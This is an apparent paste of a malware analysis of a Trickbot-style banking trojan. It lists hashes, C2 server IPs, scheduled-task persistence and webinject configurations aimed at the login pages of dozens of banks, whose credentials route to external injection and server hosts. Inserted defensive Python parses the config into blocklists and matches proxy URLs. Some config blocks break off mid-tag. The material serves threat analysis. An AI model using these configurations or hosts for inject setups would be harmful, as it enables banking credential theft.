UntitLed

a guest
Aug 6th, 2017
Hashes :
malware.exe     : bda9ea15da9a520513276b709c26d822
compiler-stamp  : (Fri Aug 04 08:39:27 2017)

Loc: %Roaming%\winapp\
client_id       : c9f921548796ca07a51c77aa61486f27
group_tag       : 8a28cb8da1ce9c1e0a91df18f99ed36e
injectDll64     : 803842eeb83b6d8618fcb59c0d490867
systeminfo64    : b06b375b380e769d563fe37d9f3e2e59
dinj            : 41fe74239746ba40f2f64ec8d811e9a2
dpost           : f762c88e05cb6a8cf8f76426964a94c7
sinj            : 4a698f7b4b7fe49ad901fdb775808bdb

PDB :
C:\Work\Sharn\GetSystemInfo_solution\x64\Release\GetSystemInfo.pdb

Traffic Observed :
https://195.88.208.193/tt0002/
186.103.161.204/tt0002/ComputerName.ID/Number/NAT%20status/client%20is%20behind%20NAT/0/ ; I am the one who NATs ... sorry, couldn't resist
https://186.103.161.204/tt0002/ComputerName.ID/Number/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/ ; c3VjY2Vzcw== = success
https://195.88.208.202:447/tt0002/ComputerName.ID/Number/injectDll64/


Persistence :
Created a scheduled task <services update> from the time of infection to start %Roaming%\winapp\malware(whatever it's called here).exe
- At log on of <username>
- Daily @ whatever time you were initially infected : if this time is missed, the "start task as soon as possible" option is selected
- If an instance is already running, don't start another one


Config :

<mcconf>
<ver>1000032</ver>
<gtag>tt0002</gtag>
<servs>
<srv>186.103.161.204:443</srv>
<srv>191.7.30.30:443</srv>
<srv>46.160.165.31:443</srv>
<srv>84.238.198.166:449</srv>
<srv>194.87.236.184:443</srv>
<srv>151.80.84.15:443</srv>
<srv>23.95.9.152:443</srv>
<srv>31.220.55.47:443</srv>
<srv>210.16.101.59:443</srv>
<srv>64.15.75.78:443</srv>
<srv>195.62.52.107:443</srv>
<srv>195.88.208.193:443</srv>
<srv>194.87.146.113:443</srv>
<srv>194.87.92.199:443</srv>
<srv>195.133.146.77:443</srv>
<srv>185.82.218.117:443</srv>
<srv>23.95.114.233:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>

<moduleconfig>
  <autostart>yes</autostart>
  <sys>yes</sys>
  <needinfo name="id"/>
  <needinfo name="ip"/>
  <autoconf>
    <conf ctl="dinj" file="dinj" period="20"/>
    <conf ctl="sinj" file="sinj" period="20"/>
    <conf ctl="dpost" file="dpost" period="60"/>
  </autoconf>
</moduleconfig>
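To turn a config blob like the one above into something a defender can act on (a C2 blocklist, a rule keyed on the group tag), here is an added Python example; it is not code from the paste. It parses a shortened copy of the page's <mcconf> and <moduleconfig> with the standard library and returns the C2 list, the autorun modules and the autoconf entries. Reading `period` as a polling interval is my assumption; the page does not state its unit.

```python
"""Pull actionable indicators out of a Trickbot-style <mcconf>/<moduleconfig> dump.

Added example, not code from the paste. The sample below is a shortened copy
of the config on the page: three of its seventeen <srv> entries, the same
<autorun> block and the same <moduleconfig>.
"""
import xml.etree.ElementTree as ET

SAMPLE_MCCONF = """<mcconf>
<ver>1000032</ver>
<gtag>tt0002</gtag>
<servs>
<srv>186.103.161.204:443</srv>
<srv>84.238.198.166:449</srv>
<srv>195.88.208.193:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>"""

SAMPLE_MODULECONFIG = """<moduleconfig>
  <autostart>yes</autostart>
  <sys>yes</sys>
  <needinfo name="id"/>
  <needinfo name="ip"/>
  <autoconf>
    <conf ctl="dinj" file="dinj" period="20"/>
    <conf ctl="sinj" file="sinj" period="20"/>
    <conf ctl="dpost" file="dpost" period="60"/>
  </autoconf>
</moduleconfig>"""


def parse_mcconf(xml_text):
    """Return version, group tag, (host, port) C2 list and autorun modules."""
    root = ET.fromstring(xml_text)
    if root.tag != "mcconf":
        raise ValueError("expected an <mcconf> document, got <%s>" % root.tag)
    servers = []
    for srv in root.iterfind("./servs/srv"):
        host, sep, port = (srv.text or "").strip().rpartition(":")
        if not sep or not port.isdigit():
            raise ValueError("malformed <srv> entry: %r" % srv.text)
        servers.append((host, int(port)))
    modules = [(m.get("name"), m.get("ctl"))
               for m in root.iterfind("./autorun/module")]
    return {
        "ver": (root.findtext("ver") or "").strip(),
        "gtag": (root.findtext("gtag") or "").strip(),
        "servers": servers,
        "autorun": modules,
    }


def parse_moduleconfig(xml_text):
    """Return the module flags, the host facts it asks for and its autoconf entries.

    `period` is kept as the integer given; the page does not state its unit.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "moduleconfig":
        raise ValueError("expected a <moduleconfig> document, got <%s>" % root.tag)

    def yes(tag):
        return (root.findtext(tag) or "").strip().lower() == "yes"

    autoconf = {}
    for conf in root.iterfind("./autoconf/conf"):
        autoconf[conf.get("ctl")] = {"file": conf.get("file"),
                                     "period": int(conf.get("period", "0"))}
    return {
        "autostart": yes("autostart"),
        "sys": yes("sys"),
        "needinfo": [n.get("name") for n in root.iterfind("needinfo")],
        "autoconf": autoconf,
    }


def nonstandard_ports(conf):
    """C2 entries not on 443: these deserve their own firewall/IDS rule."""
    return [(h, p) for h, p in conf["servers"] if p != 443]


def blocklist(conf):
    """Unique C2 hosts, sorted, for a blocklist feed."""
    return sorted({h for h, _ in conf["servers"]})


if __name__ == "__main__":
    c = parse_mcconf(SAMPLE_MCCONF)
    print("gtag", c["gtag"], "ver", c["ver"], "autorun", c["autorun"])
    print("block", blocklist(c), "non-443", nonstandard_ports(c))
    print("moduleconfig", parse_moduleconfig(SAMPLE_MODULECONFIG))
```

Run it against the full seventeen-entry list from the page and the output is the blocklist; the one entry on 449 is the kind of thing a port-based rule misses.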

Target_List:

<igroup>
<dinj>
<lm>*/Authentication/Login*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*/Accounts/AccountOverview.asp*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*cey-ebanking.com/CLKCCM/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*engine/login/businesslogin*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*bancofarnet.bancofar.es/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*bancofarnet.bancofar.es/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*unicaja*es*/PortalServle*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*unicaja*es*/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*netteller.com/login2008/Authentication*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>https://*.netteller.com/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*/isum/Main?ISUM_SCR=login&loginType=accesoSeguro&ISUM_Portal*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*/business/j_security_check*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*/business/login/Login.jsp*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*/business/cts_security_precheck*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>https://secure.*/LookAndFeel/Common/images/common/share.png?favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*.com/pub/html/login.html*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*.com/pub/html/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*/outil/UAUT*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>https://www.creditmutuel.fr/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://www.creditmutuel.fr/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>https://entreprises.secure.societegenerale.fr/</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>https://entreprises.secure.societegenerale.fr/*.html</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://entreprises.secure.societegenerale.fr/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*entreprises.natixis.com/jcms*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*entreprises.natixis.com/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>https://www.icgauth.banquepopulaire.fr/WebSSO_BP/_*html*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://*banquepopulaire.fr*asp*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://*banquepopulaire.fr/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>*cajasur.es/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*kutxabank.es/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*cajasur.es/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>*kutxabank.es/favicon.ico*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<igroup>
<dinj>
<lm>https://www.caja-ingenieros.es/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.jpg*</ignore_mask>
<ignore_mask>*.png*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://www.caja-ingenieros.es/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
<dinj>
<lm>https://be.caja-ingenieros.es/BEWeb/3025/6025/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ign
<slist>
<sinj>
<mm>https://www.bankline.natwest.com*</mm>
<sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
<nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.bankline.rbs.com*</mm>
<sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
<nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.business.hsbc.co.uk*</mm>
<sm>https://www.business.hsbc.co.uk*</sm>
<nh>crsavugwrictqdmkhxnjfzlsyeoa.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.nwolb.com*</mm>
<sm>https://www.nwolb.com/default.aspx*</sm>
<nh>cqsauvfqrkchbptxelozmsdyainj.net</nh>
<url404>*/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF*</url404>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www6.rbc.com*</mm>
<sm>https://www6.rbc.com/webapp/ukv0/signin/logon.xhtml*</sm>
<nh>chsaryoxijedlfktmvupsbqzcwgh.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.rbsdigital.com*</mm>
<sm>https://www.rbsdigital.com/default.aspx*</sm>
<nh>cksadrwyqvgokpitzunjhfslamex.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://lloydslink.online.lloydsbank.com*</mm>
<sm>https://lloydslink.online.lloydsbank.com/Logon*</sm>
<nh>dcsadhevyqfzwmcnsiobtpjkalrg.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.ulsterbankanytimebanking.ie*</mm>
<sm>https://www.ulsterbankanytimebanking.ie/default.aspx*</sm>
<nh>ddsamcpfbxhavswtquzjgiykelnd.net</nh>
<url404>/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF</url404>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://banking.bankofscotland.co.uk*</mm>
<sm>https://banking.bankofscotland.co.uk/Logon*</sm>
<nh>dbsajondmzrvtqkflybcseipuawg.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://businessbanking*.tdcommercialbanking.com*</mm>
<sm>https://businessbanking*.tdcommercialbanking.com/WBB/Login*</sm>
<nh>basabroxpcnqfdteyhazwlgmvsji.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://online-business.bankofscotland.co.uk*</mm>
<sm>https://online-business.bankofscotland.co.uk/business*</sm>
<nh>bcsaqnrhsiztfouvcdmpklwabgje.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://transtasman.online.anz.com*</mm>
<sm>https://transtasman.online.anz.com/client*</sm>
<nh>rqsccqwzhiksmjuefrlxptbogvyd.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.anzdirect.co.nz*</mm>
<sm>https://www.anzdirect.co.nz/online/EnterANZDirect.do*</sm>
<nh>rhscjefivzbwxdprlhksnmoqcgay.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://online.coutts.com*</mm>
<sm>https://online.coutts.com/eBankingCouttsLogin/login*</sm>
<nh>qasaswzlpmdufjxevhociqngybrt.net</nh>
<url404>*/error_path/404.html*</url404>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://business.co-operativebank.co.uk*</mm>
<sm>https://business.co-operativebank.co.uk/corp/*</sm>
<nh>qcsavktmfwlsohxunbzdcerpgaqi.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://fdonline.co-operativebank.co.uk*</mm>
<sm>https://fdonline.co-operativebank.co.uk/corp*</sm>
<nh>hbsabvronpckthldjquyaigsfmez.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://corporate.metrobankonline.co.uk*</mm>
<sm>https://corporate.metrobankonline.co.uk/servlet/BrowserServlet*</sm>
<nh>bosaxblkqnivecuwaygptrzfmshd.com</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www2?.bmo.com*</mm>
<sm>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login*</sm>
<nh>bosdhymixgdkzqrabfctswelopvj.org</nh>
<url404>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login?ERROR_CODE=0x00000000*</url404>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.onlinebanking.iombank.com*</mm>
<sm>https://www.onlinebanking.iombank.com/default.aspx*</sm>
<nh>kdsawblqdhtngzmuksyiaxjefcro.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://bank.barclays.co.uk*</mm>
<sm>https://bank.barclays.co.uk/olb/auth/LoginLink.action*</sm>
<nh>kbsavjthsyofzqnpburdxgciweam.net</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://corporate.santander.co.uk*</mm>
<sm>https://corporate.santander.co.uk/LOGSCU_NS_ENS*</sm>
<nh>obsamphtznlewckfbauqgvsrodxy.com</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://leumionline.bankleumi.co.uk*</mm>
<sm>https://leumionline.bankleumi.co.uk*</sm>
<nh>ohsaotjprgfakvxwulnyqzdsechm.com</nh>
<url404>/my.policy</url404>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://onlinebusiness.lloydsbank.co.uk*</mm>
<sm>https://onlinebusiness.lloydsbank.co.uk/business*</sm>
<nh>absadbagplqcmskyjntuewxhzvfo.com</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://s2b.standardchartered.com*</mm>
<sm>https://s2b.standardchartered.com/ssoapp/login.jsp*</sm>
<nh>rdsamhxbjqfidyonavurlgtzwkes.com</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://cmo.cibc.com*</mm>
<sm>https://cmo.cibc.com*</sm>
<nh>cdsaskoevwfubrtjgyqmnizcalhx.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www.anztransactive.anz.com*</mm>
<sm>https://www.anztransactive.anz.com/*</sm>
<nh>rcsamanqryvkdfjoblezxtiwsuhc.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://bbonline.banksa.com.au*</mm>
<sm>https://bbonline.banksa.com.au/html/cbank.asp*</sm>
<nh>rrsalxeyfboznkgajwvspmturqdh.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://ibs.bankwest.com.au*</mm>
<sm>https://ibs.bankwest.com.au/BWLogin/rib.aspx*</sm>
<nh>rqsaceayxbnfhvuqdswplmkzjtoi.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://netteller2.tsw.com.au*</mm>
<sm>https://netteller2.tsw.com.au/delphi/ntv451.asp*</sm>
<nh>rhsaevfyuirhsbnzakxpdtlmocgq.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://businessonline.westpac.com.au*</mm>
<sm>https://businessonline.westpac.com.au/esis/Login/SrvPage*</sm>
<nh>rssamvybridtxocunwpaqlhzgefs.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://online.corp.westpac.com.au*</mm>
<sm>https://online.corp.westpac.com.au/*</sm>
<nh>rksalhodzprnvuqxsfgmkyeictja.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://www?.my.commbiz.commbank.com.au*</mm>
<sm>https://www?.my.commbiz.commbank.com.au/Logon/UserMaintenance/Login.aspx*</sm>
<nh>qosaxuavegqkomtyndjzcbplhisw.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://bbonline.bankofmelbourne.com.au*</mm>
<sm>https://bbonline.bankofmelbourne.com.au/html/login.aspx*</sm>
<nh>qasasidoqpfhrgwykvanutzxcelj.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://banking.lloydsbank.com*</mm>
<sm>https://banking.lloydsbank.com/Logon*</sm>
<nh>qrsacdptvluyojmafikzrxwhgbqn.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://bank.ruralbank.com.au*</mm>
<sm>https://bank.ruralbank.com.au/banking/RBLIBanking*</sm>
<nh>qhsarqofnjsehzibcgvxmykapwul.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://nabconnect*.nab.com.au*</mm>
<sm>https://nabconnect*.nab.com.au/auth/nabclogin/login.do*</sm>
<nh>qksaiwgxsdkcmtqrhynvbopzaejf.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://ib.tmbank.com.au*</mm>
<sm>https://ib.tmbank.com.au/ib/signon/Login.aspx*</sm>
<nh>hosajempfozwnqlxgcbrdthivuas.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://digital.defencebank.com.au*</mm>
<sm>https://digital.defencebank.com.au*</sm>
<nh>hbsajlhrugctfpyavoqmwnbedkzi.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://velocity.ocbc.com*</mm>
<sm>https://velocity.ocbc.com/portal.view*</sm>
<nh>hksazewovfilhjutxcmdybsqkang.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://uniservices2.uobgroup.com*</mm>
<sm>https://uniservices2.uobgroup.com/ELO/login.jsp*</sm>
<nh>sosanehiqtckfxzrdjglsomvubay.org</nh>
<srv>192.99.113.67:443</srv>
</sinj>
<sinj>
<mm>https://sg.bibplus.uobgroup.com*</mm>
<sm>https://sg.bibplus.uobgroup.com/BIB/public*</sm>
<nh



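The <dinj> and <sinj> entries above are URL masks, and the practical question for a defender is "would my bank portal, or a URL in my proxy logs, fall under one of them?". Here is an added Python matcher that answers that; it is not code from the paste. Assumptions I make, none of which the page states: `*` in a mask matches any run of characters and everything else (`?` included) is literal; <ignore_mask> is tested against the URL; <require_header> against the response Content-Type; for <sinj>, <mm> is the site mask and <sm> the page mask. The sample is a constructed, well-formed subset of the page's entries under an <injects> root of my own.

```python
"""Match URLs against Trickbot-style <dinj>/<sinj> webinject masks.

Added example, not code from the paste. Assumptions: `*` in a mask matches any
run of characters and everything else (including `?`) is literal; <ignore_mask>
is tested against the URL; <require_header> against the response Content-Type;
for <sinj>, <mm> is the site mask and <sm> the page mask. SAMPLE_TARGETS is a
constructed, well-formed subset of the page's entries under an <injects> root
of my own.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_TARGETS = """<injects>
<igroup>
<dinj>
<lm>*bancofarnet.bancofar.es/*/*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
<ignore_mask>*.gif*</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<ignore_mask>*.css*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>*bancofarnet.bancofar.es/favicon.ico?*</lm>
<hl>http://162.220.162.140/response.php</hl>
<pri>100</pri>
<sq>2</sq>
</dinj>
</igroup>
<slist>
<sinj>
<mm>https://www.nwolb.com*</mm>
<sm>https://www.nwolb.com/default.aspx*</sm>
<nh>cqsauvfqrkchbptxelozmsdyainj.net</nh>
<url404>*/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF*</url404>
<srv>192.99.113.67:443</srv>
</sinj>
</slist>
</injects>"""


def mask_to_regex(mask):
    """Glob with `*` only: every other character, `?` included, is literal."""
    return re.compile(".*".join(re.escape(p) for p in mask.split("*")), re.IGNORECASE)


def mask_matches(mask, value):
    return mask_to_regex(mask).fullmatch(value) is not None


def parse_targets(xml_text):
    """Return {"igroups": [[dinj entry, ...], ...], "sinj": [sinj entry, ...]}."""
    root = ET.fromstring(xml_text)
    igroups = []
    for group in root.iterfind("igroup"):
        entries = []
        for d in group.iterfind("dinj"):
            entries.append({
                "lm": d.findtext("lm", "").strip(),
                "hl": d.findtext("hl", "").strip(),
                "pri": int(d.findtext("pri", "0")),
                "sq": int(d.findtext("sq", "0")),
                "ignore_mask": [m.text.strip() for m in d.iterfind("ignore_mask")],
                "require_header": [h.text.strip() for h in d.iterfind("require_header")],
            })
        igroups.append(entries)
    sinj = []
    for s in root.iterfind("./slist/sinj"):
        sinj.append({
            "mm": s.findtext("mm", "").strip(),
            "sm": s.findtext("sm", "").strip(),
            "nh": s.findtext("nh", "").strip(),
            "srv": s.findtext("srv", "").strip(),
            "url404": [u.text.strip() for u in s.iterfind("url404")],
        })
    return {"igroups": igroups, "sinj": sinj}


def matching_dinj(targets, url, content_type):
    """Dynamic-inject entries whose <lm> matches the URL, after applying the
    ignore masks and header requirement. Returns (group index, entry) pairs
    in config order."""
    hits = []
    for idx, group in enumerate(targets["igroups"]):
        for e in group:
            if not mask_matches(e["lm"], url):
                continue
            if any(mask_matches(m, url) for m in e["ignore_mask"]):
                continue
            if e["require_header"] and not any(
                    mask_matches(h, content_type) for h in e["require_header"]):
                continue
            hits.append((idx, e))
    return hits


def matching_sinj(targets, url):
    """Server-side-inject entries whose site mask matches the URL, with whether
    the page mask and any url404 mask matched as well."""
    out = []
    for s in targets["sinj"]:
        if mask_matches(s["mm"], url):
            out.append({"nh": s["nh"], "srv": s["srv"],
                        "sm": mask_matches(s["sm"], url),
                        "url404": any(mask_matches(u, url) for u in s["url404"])})
    return out
```

Feeding a day of proxy URLs through `matching_dinj` and `matching_sinj` is a cheap way to learn whether any host you protect is in this config's scope; a hit is a reason to watch for the injection host and the <srv> address on the wire, not proof of compromise.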
Task :

<UserId>ComputerName\UserName</UserId>
</LogonTrigger>
<CalendarTrigger>
<Repetition>
<Interval>PT3M</Interval>
<Duration>P1D</Duration>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2017-08-06T08:30:10</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
<UserId>COMPUTERNAME\USERID</UserId>
</Principal>
</Principals>
<Settings>
